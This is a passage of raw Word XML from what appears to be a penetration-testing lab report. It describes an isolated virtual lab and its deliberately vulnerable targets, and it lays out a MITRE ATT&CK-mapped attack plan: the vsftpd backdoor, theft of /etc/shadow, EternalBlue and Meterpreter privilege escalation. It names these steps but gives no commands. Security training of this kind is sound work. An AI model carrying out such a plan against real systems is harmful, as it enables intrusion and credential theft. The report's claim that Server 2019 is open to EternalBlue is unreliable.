                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A12F1A" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5298DA4D" w14:textId="57D52C7A" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00AB6328">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Fig. 1: Host-only network showing Kali, Metasploitable, Windows Server 2019, and Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFB9E5A" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075B00DD" w14:textId="493CDB0D" w:rsidR="00FB20AD" w:rsidRPr="00C668B5" w:rsidRDefault="00FB20AD" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>To ensure the presence of an attested clean state of a system before any form of intrusive exploitation activity was undertaken, complete VMware snapshots of each target virtual machine, named Pre-Engagement-Metasploitable, Pre-Engagement-WinServer2019 and Pre-Engagement-Win10 respectively, were taken to allow a rapid rollback in the event of inadvertent service disruption or corruption of forensic evidence [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770A806B" w14:textId="77777777" w:rsidR="00FB20AD" w:rsidRPr="00C668B5" w:rsidRDefault="00FB20AD" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168D5FDB" w14:textId="0A0BF24C" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00AB6328" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08437E4D" wp14:editId="26DDFAA6">
            <wp:extent cx="5943600" cy="3713480"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="8182141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8214172" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3713480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A31585" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00FB5A26">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Fig. 2: VMware snapshot manager displaying pre-engagement snapshots for all three target VMs prior to exploitation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable1Light"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1626"/>
        <w:gridCol w:w="4225"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="1D8D1CCD" w14:textId="77777777" w:rsidTr="00E320E7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FFDF542" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CB6D045" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C60EB78" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D360C91" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Deliberate Vulnerability / Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="6885B3A6" w14:textId="77777777" w:rsidTr="00E320E7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49969D58"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KALI-ATTACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="321F0DA4"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192.168.174.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C5B09CB"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Kali Linux 2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B9399F1"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Attacker workstation — Metasploit, Nmap, Hydra, Responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="188EFBB6" w14:textId="77777777" w:rsidTr="00E320E7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C49E64E"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VM-1: Metasploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A1539F7"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192.168.174.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B5DADD8"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Ubuntu / Metasploitable 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63E30DA2"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vsftpd 2.3.4 backdoor; DVWA web app; intentionally vulnerable services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="4E222177" w14:textId="77777777" w:rsidTr="00E320E7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="405B3242"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VM-2: Win Server 2019</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05A3F036"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192.168.174.135</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D43001C"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Windows Server 2019</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E6830BB"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 xml:space="preserve">Unpatched SMBv1; MS17-010 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>EternalBlue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>; no EDR deployed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="1D6BB322" w14:textId="77777777" w:rsidTr="00E320E7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E6AC087"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VM-3: Win 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3068BCE8"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192.168.174.136</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D23DD28"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Windows 10 21H2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E82F4F"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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SMBv1 / RDP exposed; weak administrator credentials; no AV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47C3D320" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3464A68B" w14:textId="77777777" w:rsidR="00EA4F2C" w:rsidRPr="00C668B5" w:rsidRDefault="00EA4F2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8140E3" w14:textId="14FF193F" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00FB20AD" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Threat Emulation Plan — MITRE ATT&amp;CK Mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA33A8C" w14:textId="144E790F" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00FB20AD" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>In principle, the adversary emulation campaign was designed based on the MITRE ATT&amp;CK Enterprise framework and the operational phase of every phase was clearly assigned a Tactic, Technique, and Procedure (TTP) identifier. The threat actor profile was defined based on opportunistic financially driven attackers that typically exploit the publicly reported vulnerabilities in unpatched publicly facing services before switching at a lateral direction in order to steal credential content and steal valuable organisational information [5].</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable1Light"/>
        <w:tblW w:w="9634" w:type="dxa"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="460"/>
        <w:gridCol w:w="1982"/>
        <w:gridCol w:w="1556"/>
        <w:gridCol w:w="5636"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w14:paraId="76162F76" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E2ADEF8" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DB8BF70" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23950262" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MITRE TTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26892326" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Planned Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w14:paraId="5A648C1D" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C27A6B8"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2833CD91"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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6661FCA7"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T1595</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58268FB9"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Active network scanning via Nmap — service version fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w14:paraId="6F600988" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E60218E"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28F42971"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Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39E69A42"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T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EB8B762"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Exploit vsftpd 2.3.4 backdoor on Metasploitable (CVE-2011-2523)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w14:paraId="74193366" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="525AABED"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B82974F"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Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BF3A756"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T1059.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D676EFA"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Unix command shell spawned via FTP backdoor trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w14:paraId="2D27A0B6" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05D5D44F"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="773E7EBD"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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="339100A9"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T1003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CD331BA"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Exfiltrate /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/shadow password hash file from Metasploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w14:paraId="7A3F1C3D" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="644D2E6C"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FFAC9EF"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Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5321DAD2"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T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D49403"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 xml:space="preserve">MS17-010 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>EternalBlue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCE against Windows Server 2019 (CVE-2017-0144)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w14:paraId="018F306C" w14:textId="77777777" w:rsidTr="00453791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="622B589A"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33F3034F"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Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CD2AEBE"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T1068</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0986559D"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 xml:space="preserve">Meterpreter </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>getsystem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
